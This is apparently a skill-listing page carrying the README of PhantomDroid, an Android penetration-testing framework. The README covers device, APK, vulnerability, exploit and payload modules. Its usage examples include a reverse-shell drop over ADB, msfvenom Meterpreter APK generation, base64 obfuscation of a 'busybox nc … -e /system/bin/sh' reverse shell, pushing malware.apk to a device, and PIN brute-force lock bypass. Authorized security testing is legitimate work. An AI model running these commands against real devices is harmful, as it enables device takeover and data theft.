SkillAgentSearch skills...

PhantomDroid

PhantomDroid is a CLI-based, all-in-one Android security assessment framework built in Python, designed for ethical hackers and professional penetration testers. It provides a unified, hacker-aesthetic terminal interface to attack multiple Android security surfaces.

Install / Use

/learn @psychohackers/PhantomDroid
About this skill

Quality Score

0/100

Category

Design

Supported Platforms

Universal

README

<div align="center">

👻 PhantomDroid

Advanced Android Penetration Testing Framework

Author: Mr. Psycho | Instagram: @the_psycho_of_hackers

Version Python Platform License

⚠️ For authorized security testing and educational purposes only.

</div>

📌 Overview

PhantomDroid is a comprehensive, CLI-based Android security assessment framework targeting ethical hackers and professional penetration testers. It integrates multiple attack surfaces into a single tool with a hacker-aesthetic terminal interface.


🚀 Features

| Module | Description | |---|---| | 📱 Device Manager | List devices, device info, ADB WiFi, screenshot, logcat, file transfer | | 🔎 APK Analyzer | Static decomposition: permissions, secrets, exported components, CVEs | | 🌐 Network Scanner | Fast port scan, WiFi info, subnet discovery, MitM guide | | 🚨 Vulnerability Scanner | CVE mapping, root detection, insecure storage, WebView, task hijacking | | 💥 Exploit Engine | Activity launch, broadcast trigger, content provider dump, deep link fuzzer, shell dropper | | 🎯 Payload Generator | msfvenom APK, reverse shell one-liners, ADB exploit scripts, obfuscation | | 📋 Report Generator | Dark-themed HTML report + JSON + CLI table with remediation advice |


⚙️ Installation

# 1. Clone / navigate to the tool directory
cd /path/to/phantomdroid
# or
git clone https://github.com/psychohackers/PhantomDroid.git

#2. create a virtual environment
python -m venv venv 
source venv/bin/activate

# 3. Install Python dependencies
pip3 install -r requirements.txt

# 4. (Optional) Install ADB
sudo apt install adb       # Debian/Ubuntu
sudo pacman -S android-tools  # Arch

# 5. (Optional for payload generation) Install Metasploit
# https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

🖥️ Usage

Interactive Mode (Recommended)

python3 phantomdroid.py
# or
python3 phantomdroid.py --interactive

CLI Mode

# List connected devices
python3 phantomdroid.py --devices

# Full device info
python3 phantomdroid.py --device ABC123 --info

# Analyze APK + generate HTML report
python3 phantomdroid.py --apk target.apk --report html --target-name "com.example.app"

# Port scan device
python3 phantomdroid.py --device ABC123 --port-scan

# Full vulnerability scan
python3 phantomdroid.py --device ABC123 --vuln-scan --pkg com.example.app

# Check for CVEs based on Android version
python3 phantomdroid.py --device ABC123 --cve-check

# Check if device is rooted
python3 phantomdroid.py --device ABC123 --root-check

# Capture logcat (200 lines)
python3 phantomdroid.py --device ABC123 --logcat 200

# Capture screenshot
python3 phantomdroid.py --device ABC123 --screenshot

# Enable ADB over WiFi
python3 phantomdroid.py --device ABC123 --adb-wifi

# WiFi info
python3 phantomdroid.py --device ABC123 --wifi-info

# SSL pinning check
python3 phantomdroid.py --device ABC123 --ssl-pinning com.example.app

# MitM proxy setup guide
python3 phantomdroid.py --mitm-guide

# Launch exported activity
python3 phantomdroid.py --device ABC123 --exploit activity \
  --pkg com.example.app --activity com.example.app.DebugActivity

# Deep link fuzzer
python3 phantomdroid.py --device ABC123 --exploit deep-link \
  --pkg com.example.app --scheme myapp

# Drop reverse shell via ADB
python3 phantomdroid.py --device ABC123 --exploit shell-drop \
  --lhost 192.168.1.100 --lport 4444

# Generate msfvenom APK payload
python3 phantomdroid.py --payload reverse_tcp \
  --lhost 192.168.1.100 --lport 4444 --payload-out evil.apk

# Generate reverse shell one-liners
python3 phantomdroid.py --payload reverse-shells \
  --lhost 192.168.1.100 --lport 4444

# Obfuscate a command
python3 phantomdroid.py --payload obfuscate \
  --raw-payload "busybox nc 10.0.0.1 4444 -e /system/bin/sh" \
  --obfuscate-method base64

# Pull file from device
python3 phantomdroid.py --device ABC123 --pull /sdcard/secret.txt

# Push file to device
python3 phantomdroid.py --device ABC123 --push malware.apk /sdcard/malware.apk

# Discover live hosts on subnet
python3 phantomdroid.py --discover 192.168.1

# Generate JSON + HTML report
python3 phantomdroid.py --apk app.apk --device ABC123 --vuln-scan \
  --pkg com.example --report both --target-name "Example Corp App"

🧩 Module Details

APK Analyzer

  • Permission audit — flags 30+ dangerous Android permissions by severity (CRITICAL → LOW)
  • Hardcoded secrets — scans DEX, XML, JSON, JS for API keys, passwords, AWS keys, Firebase configs, DB URLs
  • Exported components — activities, services, receivers, providers
  • File hashes — MD5, SHA1, SHA256
  • Obfuscation detection, native libraries, embedded URLs & IPs
  • Vulnerability heuristics — debuggable flag, backup enabled, no network security config

Vulnerability Scanner

  • CVE Mapping — 30+ CVEs mapped to Android SDK levels (Stagefright, BlueBorne, StrandHogg, BlueFrag, etc.)
  • Root detection — su binary, Magisk, SuperSU, debuggable build
  • Frida detection — checks running processes for Frida server
  • Insecure data storage — SharedPreferences, SQLite, world-readable files
  • WebView checks — JS enabled, file:// access
  • Task hijacking — StrandHogg-style taskAffinity check

Exploit Engine

| Module | Description | |---|---| | Activity Launch | Launch exported activities without permission | | Broadcast Trigger | Send malicious broadcast intents | | Content Provider | Dump arbitrary content provider data | | Deep Link Fuzzer | Fuzz 20+ deep link paths for unprotected endpoints | | Frida Injection | Step-by-step Frida/objection injection guide | | Reverse Shell Drop | Push & execute busybox/nc reverse shell via ADB | | DB Extractor | Pull SQLite databases from app data directory | | Lock Bypass | PIN brute force via ADB keyevents |

Payload Generator

| Type | Description | |---|---| | reverse_tcp | msfvenom Android Meterpreter reverse TCP APK | | reverse_https | msfvenom HTTPS reverse shell APK | | reverse-shells | 6 reverse shell one-liners (nc, bash, python3, perl, socat) | | adb-script | Full ADB exploitation shell script | | obfuscate | Base64 or hex payload obfuscation |


📋 Report Output

PhantomDroid generates:

  • HTML Report — dark glassmorphism theme, severity badges, finding cards with CVE links and remediation advice
  • JSON Report — structured machine-readable output
  • CLI Table — quick terminal summary sorted by severity (CRITICAL → LOW)

🔧 Requirements

| Requirement | Purpose | |---|---| | Python 3.8+ | Runtime | | rich | Terminal UI | | requests | HTTP checks | | ADB (optional) | Device interaction | | Metasploit (optional) | APK payload generation | | Frida (optional) | Runtime instrumentation | | mitmproxy (optional) | Traffic interception |


⚠️ Legal Disclaimer

PhantomDroid is intended exclusively for authorized security assessments, CTF competitions, and educational research.

Unauthorized use of this tool against systems you do not own or have explicit written permission to test is illegal under the Computer Fraud and Abuse Act (CFAA), Computer Misuse Act, and equivalent laws in most jurisdictions.

The author Mr. Psycho and contributors assume no liability for any misuse or damage caused by this tool.


<div align="center"> Made with 💜 by <strong>Mr. Psycho</strong> | <a href="https://instagram.com/the_psycho_of_hackers">@the_psycho_of_hackers</a> </div>
View on GitHub
GitHub Stars16
CategoryDesign
Updated2d ago
Forks6

Languages

Python

Security Score

90/100

Audited on Apr 4, 2026

No findings